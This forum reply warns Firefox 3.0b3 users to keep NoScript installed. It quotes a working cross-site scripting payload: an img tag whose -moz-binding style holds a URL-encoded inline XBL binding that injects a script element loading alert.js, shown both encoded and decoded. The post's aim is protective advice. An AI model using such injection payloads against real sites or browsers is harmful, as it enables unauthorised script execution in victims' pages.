Hi OrangeCrate,
But do not run FF 3.0b3 without NoScript, because the old NoScript silently does it's work in the background preventing this, where the FF 3.0 devs left this hole:
it looks like the ever popular -moz-binding css attribute is now rendered a little less useful. It is now impossible to load off-site XBL via this method.
However, all is not lost. For in patching one of the biggest holes in Firefox’s security model, the infinite wisdom of the FF devs is that it is now possible to embed a -moz-binding URL tag inline, like this:
<img src=”blah” style=”-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)” />
Using this method provides for no use of a fragment identifier, indeed it is only possible to use the first element. The above XBL decodes to:
<?xml version=”1.0″?><bindings xmlns=”http://www.mozilla.org/xbl”><binding id=”loader”><implementation><constructor><![CDATA[var url = “alert.js”;var scr = document.createElement(”script”);scr.setAttribute(”src”,url);var bodyElement = document.getElementsByTagName(”html”).item(0);bodyElement.appendChild(scr);]]></constructor></implementation></binding></bindings>
which essentially creates a nice new DOM script element that loads alert.js.
NoScript completely protects you against this,
polonus